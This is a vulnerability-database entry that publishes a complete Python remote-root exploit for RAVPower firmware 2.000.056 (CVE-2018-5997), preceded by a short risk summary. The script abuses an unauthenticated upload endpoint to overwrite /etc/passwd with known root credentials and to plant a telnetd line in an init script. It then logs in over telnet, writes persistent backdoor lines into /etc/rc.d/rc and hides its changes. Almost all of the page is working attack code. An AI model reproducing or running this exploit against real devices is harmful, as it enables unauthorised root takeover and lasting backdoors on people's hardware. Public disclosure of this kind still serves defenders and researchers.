RAVPower 2.000.056 Remote Root Code Execution

2018.01.25
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

""" # Exploit Title: RAVPower - remote root # Date: 23/01/2018 # Exploit Authors: Daniele Linguaglossa # Vendor Homepage: https://www.ravpower.com/ # Software Link: https://www.ravpower.com/ # Version: 2.000.056 # Tested on: OSX # CVE : CVE-2018-5997 """ import requests import time import telnetlib PATH_PASSWD = "/etc" FILE_PASSWD = "passwd" PATH_VSTFUNC = "/etc/init.d" FILE_VSTFUNC = "vstfunc" FILE_RC = "/etc/rc.d/rc" BACKDOOR_TERM = "export TERM=xterm" BACKDOOR_TELNET = "/usr/sbin/telnetd &" BASH_SHEBANG = "#!/bin/sh" TELNETD = "/usr/sbin/telnetd -p 1111 &" def upload(host, port, path, name, content): user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0" path = "/upload.csp?uploadpath=%s&file=1515865637281" % path url ="http://{0}:{1}{2}".format(host,port,path) files = {'file' : ('%s' % name, content,'application/octet-stream')} headers = { "user-agent": user_agent } try: requests.post(url,headers=headers,files=files) return True except: return False # root:admin tmp_passwd = """root:$1$YBm5LfCo$5OEwLPLUu085z5EoDpQz7/:0:0:root:/data/UsbDisk1/Volume1:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin admin:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:15:0:admin:/data/UsbDisk1/Volume1:/bin/sh mail:*:8:8:mail:/var/mail:/bin/sh nobody:x:65534:65534:Nobody:/data/UsbDisk1/Volume1:/bin/sh guest:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:512:0:guest:/data/UsbDisk1/Volume1/Share:/bin/sh-new """ tmp_vstfunc = """ export PATH=/bin:/sbin:/usr/bin:/usr/sbin # A function to stop a program. killproc() { local base=${1##*/} local pid= pid=`pidof $base` local i if [ -n "$pid" ]; then for i in $pid ; do kill -KILL $i > /dev/null 2>&1 done fi rm -f /var/run/$base.pid return 0 } # A function to find the pid of a program. pidofproc() { local base=${1##*/} #First try "/var/run/*.pid" files if [ -f "/var/run/$base.pid" ]; then local line p pid= read line < /var/run/$base.pid for p in $line ; do [ -z "$p" -a -d "/proc/$p" ] && pid="$pid $p" done else pid=`pidof $1 || pidof $base` fi if [ -n "$pid" ]; then echo $pid return 0 fi return 1 } # Check if $pid (could be plural) are running # Return : 0 run # 1 stop checkpid() { local i for i in $* ; do if [ -d "/proc/$i" ]; then return 0 fi done return 1 } # Check disk exist checkdisk() { return $? } # save pid and log function savesc() { local i=0 if [ -n "$3" ]; then touch /var/run/$3.pid fi return $? } # A function check start of a program. # return: 1 not exist # 0 exist checkonly() { local prgname=${1##*/} local pid= if [ -f "/var/run/$prgname.pid" ]; then pid=`pidof $prgname` if [ -n "$pid" ]; then return 0 fi return 1 else pid=`pidof $prgname` if [ -n "$pid" ]; then if sleep 1 && checkpid $pid && sleep 1 && checkpid $pid && sleep 2 && checkpid $pid ; then return 2 fi fi return 2 fi } # A function save etc to mtd. # return: 1 failure # 0 success saveetc() { local ret=0 /usr/sbin/etc_tools t > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] /usr/sbin/etc_tools p > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] return $ret } # A function resume mtd to etc. # return: 1 failure # 0 success resumeetc() { local ret=0 /usr/sbin/etc_tools b > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] /usr/sbin/etc_tools u > /dev/null 2>&1 let ret=ret+$? # ret=$[$ret + $?] return $ret } # Create a lock for /var/lock AppScriptLock() { if [ -f /var/lock/$1.pid ]; then return 0 else touch /var/lock/$1.pid return 1 fi } # Check a lock for /var/lock AppScriptChkLock() { if [ -f /var/lock/$1.pid ]; then return 1 else return 0 fi } # Delete a lock for /var/lock AppScriptUnlock() { if [ -f /var/lock/$1.pid ]; then rm -rf /var/lock/$1.pid fi return 1 } DISKPATH="/data/UsbDisk1/Volume1/.vst/upgrade" ETCPATH="/boot/tmp" ETCBKPATH="/boot/tmp/etcbackup" DISKETCFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etc.tar" DIDKETCBKFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etcbackup.tar.gz" ETCFILE="/boot/tmp/etc.tar" ETCBKFILETAR="/boot/tmp/etcbackup.tar" ETCBKFILE="/boot/tmp/etcbackup.tar.gz" FILELIST="hostname passwd shadow samba/smbpasswd fileserv/lighttpd.user dropbox baidu" FILELIST1="hostname" backup_etc() { rm $ETCBKFILETAR -rf rm $ETCBKFILE -rf rm $ETCBKPATH -rf # if [ ! -e $DISKPATH ];then # mkdir -p -m 755 $DISKPATH # fi if [ ! -e $ETCBKPATH ]; then mkdir -p -m 755 $ETCBKPATH fi if [ -z $1 ]; then FILELISTALL=$FILELIST else if [ $1 == "resume" ]; then FILELISTALL=$FILELIST1 fi fi for f in $FILELISTALL do if [ -d /etc/$f ]; then cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1 else if [ "$f" == "samba/smbpasswd" ]; then if [ ! -e $ETCBKPATH/samba ]; then mkdir -p $ETCBKPATH/samba fi cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1 elif [ "$f" == "fileserv/lighttpd.user" ]; then if [ ! -e $ETCBKPATH/fileserv ]; then mkdir -p $ETCBKPATH/fileserv fi cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1 elif [ "$f" == "serversman/cloud.conf" ]; then if [ ! -f /etc/$f ]; then continue fi if [ ! -e $ETCBKPATH/serversman ]; then mkdir -p $ETCBKPATH/serversman fi cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1 else cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1 fi fi done tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1 gzip $ETCBKFILETAR if [ -f $ETCBKFILE ]; then cp -rf $ETCBKFILE $DIDKETCBKFILE fi } backup_etc_telnet() { rm $ETCBKFILETAR -rf rm $ETCBKFILE -rf rm $ETCBKPATH -rf # if [ ! -e $DISKPATH ];then # mkdir -p -m 755 $DISKPATH # fi if [ ! -e $ETCBKPATH ]; then mkdir -p -m 755 $ETCBKPATH fi if [ -z $1 ]; then FILELISTALL=$FILELIST else if [ $1 == "resume" ]; then FILELISTALL=$FILELIST1 fi fi touch $ETCBKPATH/telnetflag tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1 gzip $ETCBKFILETAR if [ -f $ETCBKFILE ]; then cp -rf $ETCBKFILE $DIDKETCBKFILE fi } restore_etc() { if [ -f $ETCBKFILE ]; then gunzip $ETCBKFILE tar xvf $ETCBKFILETAR -C / > /dev/null 2>&1 for f in $FILELIST do if [ -d /etc/$f ]; then echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc #cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 cp -rf $ETCBKPATH/$f /etc > /dev/null 2>&1 else if [ "$f" == "samba/smbpasswd" ]; then echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 elif [ "$f" == "fileserv/lighttpd.user" ]; then echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 elif [ "$f" == "serversman/cloud.conf" ]; then if [ ! -f $ETCBKPATH/$f ]; then continue fi echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 else echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1 fi fi done if [ -f $ETCBKPATH/telnetflag ]; then touch /etc/telnetflag fi fi } # A function check usb flag # return: 0 service start # 1 service stop check_usb_flag() { local ret=0 if [ -e "/proc/usbwrite" ];then ret=`cat /proc/usbwrite` fi return $ret } ########################################################################### # # LED operations # ########################################################################### led_wink_start() { LED=`cat /proc/vsled` if [ $LED -eq 3 ]; then pioctl wifi 2 fi } led_wink_stop() { LED=`cat /proc/vsled` if [ $LED -eq 2 ]; then pioctl wifi 3 fi } led_wink_chk() { LED=`cat /proc/vsled` if [ $LED -eq 2 ]; then return 1 else return 0 fi } ########################################################################### # # Flag operation # ########################################################################### flagctl_get() { if [ -e /dev/sda ]; then trynum=0 while [ $trynum -lt 3 ]; do retval=`/usr/sbin/flagctl disk get $1` if [ ! -z $retval ]; then return $retval fi let trynum=trynum+1 # trynum=$[$trynum+1] sleep 1 done fi } flagctl_set() { if [ -e /dev/sda ]; then trynum=0 while [ $trynum -lt 3 ]; do /usr/sbin/flagctl disk set $1 $2 flagctl_get $1 if [ "$?" -eq "$2" ]; then sync return 1 fi let trynum=trynum+1 # trynum=$[$trynum+1] sleep 1 done fi return 0 } ########################################################################### # # string function # ########################################################################### str_func_strstr () { if [ ${#2} -eq 0 ];then echo "$1" return 0 fi case "$1" in *$2*) return 1 ;; *) return 0 ;; esac } dev_test_host() { nordev=`echo $1 | cut -c -3` s_str=`ls -l /sys/block/$nordev/device` str_func_strstr "$s_str" "host0" if [ $? -eq 1 ]; then return 1 fi return 0; } dev_test_usb() { nordev=`echo $1 | cut -c -3` s_str=`ls -l /sys/block/$nordev/device` str_func_strstr "$s_str" "usb" if [ $? -eq 1 ]; then return 1 fi return 0; } ########################################################################### # # Permission check functions # ########################################################################### # $1: device name # $2: host/usb # $3: if recursive, 1: enable, 0: disable perm_change_start() { permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2` if [ ! -z $permpid ]; then return 1; else /usr/sbin/permchange $1 $2 $3 & fi } # $1: device name # $2: if recursive, 1: enable, 0: disable perm_chk_start() { dev_test_host $1 if [ $? -eq 1 ]; then perm_change_start $1 host $2 else perm_change_start $1 usb $2 fi } perm_chk_stop() { permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2` if [ ! -z $permpid ]; then for ppid in $permpid ; do kill -9 $ppid > /dev/null 2>&1 done fi } ########################################################################### # Time function ########################################################################### timedate_settosys() { if [ -e /etc/timedate ]; then TIMESET=`cat /etc/timedate` date -s $TIMESET fi } timedate_save() { date '+%Y.%m.%d-%H:%M:%S' > /etc/timedate } """ print "RAVPower Remote root (0day) - By dzonerzy & r3dx0f\n\n" host = raw_input("Insert Ravpower IP: ") print "[*] Step 1 -> pwning /etc/passwd" if not upload(host, 80,PATH_PASSWD,FILE_PASSWD,tmp_passwd): print "[-] Filed to pwn /etc/passwd maybe fixed?" exit(0) print "[*] Step 2 -> pwning /etc/init.d/vstfunc" if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+TELNETD+"\n"+tmp_vstfunc): print "[-] Filed to pwn /etc/init.d/vstfunc maybe fixed?" exit(0) t = None print "[*] Step 3 -> Try to remove or insert SD Card or just wait for something happen (something must happen!)" while True: try: print "[*] Step 3-1 -> Trying to telnet..." t = telnetlib.Telnet(host, port=1111) break except: time.sleep(5) t.read_until(": ") t.write("root\n") t.read_until(": ") t.write("admin\n") t.read_until("# ") print "[*] Step 4 -> pwning /etc/rc.d/rc" t.write("echo '%s' >> %s\n" % (BACKDOOR_TERM, FILE_RC)) t.read_until("# ") t.write("echo '%s' >> %s\n" % (BACKDOOR_TELNET, FILE_RC)) t.read_until("# ") print "[*] Step 4-1 -> pwned!" print "[*] Step 5 -> Saving settings" t.write("/usr/sbin/etc_tools p\n") t.read_until("# ") print "[*] Step 5-1 -> Done!" print "[*] Step 6 -> Starting telnetd" t.write("/usr/sbin/telnetd &\n") t.read_until("# ") print "[*] Step 6-1 -> Done!" print "[*] Step 7 -> Killing old telnet" t.write("ps aux |grep 1111 | awk '{print $2}' | xargs kill -9\n") t.read_until("# ") print "[*] Step 7-1 -> Done!" print "[*] Step 8 -> Restoring vstfunc" if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+tmp_vstfunc): print "[-] Filed to pwn /etc/init.d/vstfunc fixed?" exit(0) print "[*] Step 8-1 -> Done!" print "[!] PWNAGE COMPLETED! connect with root:admin"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top